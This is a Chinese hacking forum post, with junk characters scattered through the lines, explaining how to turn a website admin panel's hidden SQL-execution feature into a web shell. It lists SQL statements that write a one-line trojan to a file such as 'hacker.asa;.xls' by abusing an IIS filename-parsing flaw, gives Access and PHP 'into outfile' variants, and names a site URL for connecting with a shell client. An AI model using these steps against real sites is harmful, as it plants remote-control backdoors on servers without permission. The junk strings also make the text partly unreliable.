好不容易进了后台,发现啥上传啊。备份啊多木有。9 L5 o8 B% w2 G8 {" y" i; A
webshell一直拿不到。后来翻了一下源码。有一个执行SQL命令的2 N8 s7 {/ z# x+ P; d3 g
文件。可后台没显示这功能。直接填上文件名字,执行命令的选项出来了,7 ]3 t- }7 F8 {3 W8 ^0 c: W$ H
然后就试用了下面的命令导出一句话木马。没想到成功了。命令方法如下:* H* s$ {, x. k/ n2 c
1.create table cmd (a varchar(50))3 j: T, o! `6 c3 E
2.insert into cmd (a) values (‘‘)7 ], x: l" c0 ^/ k3 W
3.select * into [a] in ‘D:\wwwroot\www.koohik.com\hacker.asa;.xls’ ‘excel 4.0;’ from cmd
- ]- p+ d! P0 _' A# r(把表cmd的内容导出为物理路径的一个EXCEL文件)( O; F$ r8 D% [8 t
4.drop table cmd
! m7 ?" K% T2 {# u* \# g利用IIS的BUG成功拿到了WEBSHELL。- ?8 {% y6 V- E
3 v; ?2 h# L `* g/ l/ h# Q) V: z
直接菜刀里连接http://www.chouwazi.com/data/xiao.asp;xiao.xls一句话
% ^2 v6 o n3 b& Q: O. l
4 {3 s! L3 w9 O$ {" N, s% G0 q+ q SQL语句意思解释:: z7 [( j+ C7 u. |
第一句
; Z* ]% M: x) x: X' s# u/ Q2 `) k 建立一个有一个A字段的表 表名为cmd 字段类型为字符 长度为50- t; P- U2 [3 i' S
! ]# y* Q5 y4 x6 N& r 第二句' R8 O# L( d8 u
在表cmd的a字段插入一句话木马3 q+ i) b5 o, j" v1 O! e
第三句
' V: E+ U% f" D 把cmd表a的内容导出到路径e:\host\chouwazi.com\web\data\的EXCEL文件
9 o8 X5 R; n. ~5 j) q0 A7 r
f% \* T- l7 {# y0 K. x" R( o+ F 第四句
k9 V) m6 m- S) K# T6 r; z 删除建立的cmd表
( W5 N' Z/ _8 ]) P8 J) N
; \8 ~8 z, `! y% I6 M( O 以下内容为测试:
v% P# q% R( H Access利用后台SQL执行命令功能导出WebShell:
; E! {& `/ F' E3 `6 l M 这个更简单:$ @ J' q) b m& \4 |
[ol][li]Select 'asp一句话木马' into [vote] in 'd:/chouwazi.com/x.asp;.xls' 'excel 8.0;' from vote [/li][/ol]# q) |) @; O$ u* W& x" S1 D& B, i
或者
! K1 m7 D$ C4 G- f [ol][li]Select 'php一句话木马' into outfile 'F:/wwwroot/chouwazi.com/eval.php'; [/li][/ol]
p# g" S& l) s2 }6 d/ H+ f8 b# Y
8 @3 ^0 n: x' r% Y t, w 后台有执行SQL语句功能(vote为已知表段)
1 W- s/ \1 O( T3 e3 F 希望对大家有所帮助拿shell的又一个思路
: f5 |4 f, ~) c" K9 v a% X- D |